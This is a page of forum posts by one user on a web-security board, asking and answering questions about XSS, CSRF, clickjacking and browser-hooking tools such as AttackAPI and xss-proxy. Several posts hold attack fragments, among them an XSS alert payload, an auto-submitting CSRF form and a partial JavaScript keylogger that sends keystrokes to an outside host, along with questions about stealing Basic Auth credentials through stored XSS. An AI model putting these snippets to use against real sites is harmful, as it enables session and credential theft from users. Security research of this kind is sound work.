Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 33
5 years ago
jamuse
if you find any bugs, or have a feature request, you can ping me or post to the AttackAPI mailing list, and I should be able to sort it out for you.
Forum: XSS Info
5 years ago
jamuse
You can force IE to show the real error message and not the "friendly" one by making sure your payload is longer than 512 bytes.
Forum: XSS Info
5 years ago
jamuse
The latest version of AttackAPI has the AttackAPI.dom.scanFiles() function which can be used to scan a machine for installed software. It uses the res protocol.
Forum: XSS Info
5 years ago
jamuse
I've seen the frame-breaking code suggestion, but if you can implement random non-predictable URLs (or even just a parameter) on the server, why would you want to rely on a JavaScript solution? Unless I'm missing something, an attacker can't frame a non-predictable URL, thus she can't create a link to trick the victim into clicking. Take my original example, it seems that adding a random parameter
Forum: CSRF and Session Info
5 years ago
jamuse
if the app isn't vulnerable to any XSS flaws, then under what circumstances would a non-predictable URL **not** provide ClickJacking protection then?
Forum: CSRF and Session Info
5 years ago
jamuse
Would adding a per-page nonce in the URL protect against ClickJacking attacks? For example, say the only static URL for the app was hxxp://bank.com which returned a login screen. Every URL after that used a POST request with a per-page nonce in the URL and a seperate per request nonce in the post data. The app would terminate the session any time either of these nonces are submitted incorrectly an
Forum: CSRF and Session Info
6 years ago
jamuse
Can you use the Location header to redirect the victim to a site under your control and launch the javascript from there?
Forum: XSS Info
6 years ago
jamuse
@Gareth I had an (incorrect) regex that search for the 'http' string in the url2xss parameter, otherwise I redirected. That should have stopped your second example. Where you able to get an alert box with your PoC: hxxp://zur.homelinux.com/xssForwarder.php?url2xss=javascript:alert(1)&doit=done&intl=1&tt=urltext&trtext=this+is+a+test&lp=en_it&btnTrTxt=Translate That inc
Forum: XSS Info
6 years ago
jamuse
Hehe, I wrote my own because I wanted the auto-submit feature, oh well. Gareth: I tried your PoC in FF2 but did not see an alert box, which browsers should it work on? BTW I added ENT_QUOTES to the script, so it should not work anymore.
Forum: XSS Info
6 years ago
jamuse
First verify that you can get an alert box. Check what payload your scanner used as you may find that a simple "><script>alert(123)</script> may not be sufficient in some cases. Once you've verified its existence check out if there are any limitations in payload size or allowed characters. There are a number of techniques to bypass both of these limitations if you have enough s
Forum: XSS Info
6 years ago
jamuse
You can try my POST to GET forwarder at: http://zur.homelinux.com/xssForwarder.php
Forum: XSS Info
6 years ago
jamuse
Thanks, I tried emailing PDP, PMing, and even posted to the AttackAPI mailing list, but no dice. I did make some progress though, perhaps this may shed a little light on the problem. After I zombiefy a client, that client sends requests to /undefined, which results in a 404 (the full request is shown below) (hxxp://localhost/undefined?action=pull&callback=AttackAPI.dom.spawnChannel.channe
Forum: XSS Info
6 years ago
jamuse
Nah, thats no good either. For example lets you have an iframe who's source is pointed to an external site which redirects the user back to your site. Think of one of the many XSS / CSRF forwarder scripts out there. A malicious user includes an iframe sending the victim to the external site, the external site then forces the victim's browser to send a CSRF request to your site, which would include
Forum: XSS Info
6 years ago
jamuse
What about using an iframe who's high and width are set to zero for CSRF attacks?
Forum: XSS Info
6 years ago
jamuse
I'd like to use AttackAPI to demonstrate similar functionality to xss- proxy. After reading Chapter 7 of the XSS attacks book and http://www.gnucitizen.org/blog/persistent-bi-directional-communication-channels, I'm still have the following questions: 1. When exploiting an XSS vuln what do I need to include in the payload to zombiefy the victim browser? 2. I tried the controlling zom
Forum: XSS Info
6 years ago
jamuse
It was fixed in the latest browsers but there seems to be a work around that Amit Klien came up with. By adding some white space before the method, you can bypass the TRACE restriction in IE. For more details see: http://jeremiahgrossman.blogspot.com/2007/04/xst-lives-bypassing-httponly.html
Forum: CSRF and Session Info
6 years ago
jamuse
I'm setting up a PoC CSRF demo and want to send the entire HTML results to a third party site. I'm using the following code to send the request: <HTML> <BODY> <form method="GET" id="evil" name="evil" action="http:///showinfo.aspx"> </form> <script> document.evil.submit(); </script> </BODY> &
Forum: CSRF and Session Info
7 years ago
jamuse
I didn't think it was possible until I saw that xssshell claims that it can steal basic auth credentials. Anybody have any experience with xssshell? What mechanism does it use to get access to the basic auth header?
Forum: XSS Info
7 years ago
jamuse
I am testing an app that has a stored XSS vuln, The app uses both a SessionID and Basic Authentication. How can I use the stored XSS vuln to steal the Basic Authentication? The site does not accept the TRACE method.
Forum: XSS Info
7 years ago
jamuse
I'm trying to figure out how character permeations work in relation to XSS attacks. Say I have the following vulnerable PHP script: <HTML> <HEAD> </HEAD> <BODY> <? $xss = $_GET["xss"]; print "$xss"; ?> </BODY> </HTML> and want to use &#60 to represent the < character to bypass a hypothetical filter th
Forum: XSS Info
7 years ago
jamuse
If I understood the question correctly, then have you tried sending some malicious code in the given variables and adding print or echo statements before those variables are used for anything to see what they're set to?
Forum: XSS Info
7 years ago
jamuse
In my attempt to learn javascript, I started writing a keylogger. So far I have the following: function logKeys(e) { var keybfr = ""; var isNetscape = (navigator.appName.indexOf("Netscape") != -1); var keybfr = (isNetscape) ? String.fromCharCode(e.which) : String.fromCharCode(e.keyCode); var img = new Image(); img.src = "http://mysite.com/kl_&q
Forum: XSS Info
7 years ago
jamuse
23. Spiders
Are there any freely available spiders that can compete with the likes of Appscan / Webinspect in terms of finding and parsing non standard links? I know burp has some javascript support, but it never seems to find the amount of web pages that the proprietary spiders find.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jamuse
Anton, The new version hasn't hit sourceforge yet. Is there another homepage for the project? So the admin browser will be able to easily access files on the victims computer, thats pretty cool.
Forum: XSS Info
7 years ago
jamuse
Thanks! One more question, is there a reason the iframe in the victim's browser is so small?
Forum: XSS Info
7 years ago
jamuse
which browser did the code work for you on? I tested on FF2.0, Opera9 and IE6 and have not gotten the text to change.
Forum: XSS Info
7 years ago
jamuse
I'm looking for a little guidance in getting xss-proxy working. I'm trying to XSS myself. I set $PORT to 81 and kept $code_server as http://localhost. I created an HTML called xss.html with <script src="http://localhost:81/xss2.js"></script> When I access xss.html (http://localhost:80/xss.html) I can see the request in the clients section of the xss-proxy admin console, bu
Forum: XSS Info
7 years ago
jamuse
Thanks for your help, I'm still missing something though. I put the following in the payload: <script> setTimeout('doIt()',1000); function doIt() { input='is'; output='was'; document.body.innerHTML = document.body.innerHTML.replace(input,output); } </script> Can you see what's missing?
Forum: XSS Info
7 years ago
jamuse
Getting back to hasse's suggestion, I want to replace just the word 'is' with 'was' using the same HTML example as above (i.e. output: "this was a test"). I tried sending: http://localhost/id.php?xss=%3Cscript%3EsetTimeout('doIt()',1000);function%20doIt(){input%20=%20'is';%20output%20=%20'was';document.body.innerHTML.replace(input,output);}%3C/script%3E but was unsuccesful. What am I
Forum: XSS Info
7 years ago
jamuse
yup, that did it, thanks.
Forum: XSS Info
Pages: 12Next
Current Page: 1 of 2